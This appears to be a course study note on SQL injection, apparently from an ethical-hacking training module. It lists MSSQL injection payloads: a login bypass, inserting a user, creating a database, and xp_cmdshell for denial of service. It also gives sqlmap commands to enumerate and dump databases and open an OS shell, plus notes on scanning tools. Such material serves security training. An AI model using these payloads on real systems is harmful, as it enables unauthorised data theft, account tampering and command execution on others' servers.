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Module 15 - SQL

File metadata and controls

62 lines (39 loc) · 2.49 KB

Module 15 - SQL Injection

SQL Injection on an MSSQL Database

blah' or 1=1 -- -

blah'; insert into login values('john','apple123'); -- - - Inserting a new user into the table 'login'

blah'; create database mydatabase; -- - - Creating a new database

blah'; exec master..xp_cmdshell 'ping -l 65000 -t'; -- - - To perform a DoS to a site


sqlmap -u <URL with Parameters - Ex. /?id=1> --cookie=<document.cookie> --dbs - It tampers with the parameters in the URL to attempt to extract database information

sqlmap -u <URL with Parameters - Ex. /?id=1> --cookie=<document.cookie> -D <Database Name> - It displays info about the specific database

sqlmap -u <URL with Parameters - Ex. /?id=1> --cookie=<document.cookie> -D <Database Name> --tables - It displays the tables of the specified database

sqlmap -u <URL with Parameters - Ex. /?id=1> --cookie=<document.cookie> -D <Database Name> -T <Table> --columns - It displays the columns of the specified table

sqlmap -u <URL with Parameters - Ex. /?id=1> --cookie=<document.cookie> -D <Database Name> -T <Table> --dump - It dumps all the info about the specified table

sqlmap -u <URL with Parameters - Ex. /?id=1> --cookie=<document.cookie> --os-shell - To execute an os shell

Other SQL Injection Tools

Detecting SQL Injection Vulnerabilities


It can be downloaded: git clone Or in Windows at: Module 15 SQL Injection\GitHub Tools.

python3 -u <URL with Parameters - Ex. /?id=1> --cookie="<document.cookie>" - It will provide you with a link with SQLi results


It can be found at: Module 11 Session Hijacking\OWASP ZAP\.

'Quick Start' tab > 'Automated Scan' > Select the URL > 'Attack'. In the 'Alerts' tab the found vulns will appear.

Other SQL Injection Detection Tools

Scanning Web Applications


  1. Enter the URL and the 'OWASP Policy' Scan Policy. Leave everything else to default.
  2. 'Start Scan'

It shows the website tree, the vulnerabilities found, objects, stats...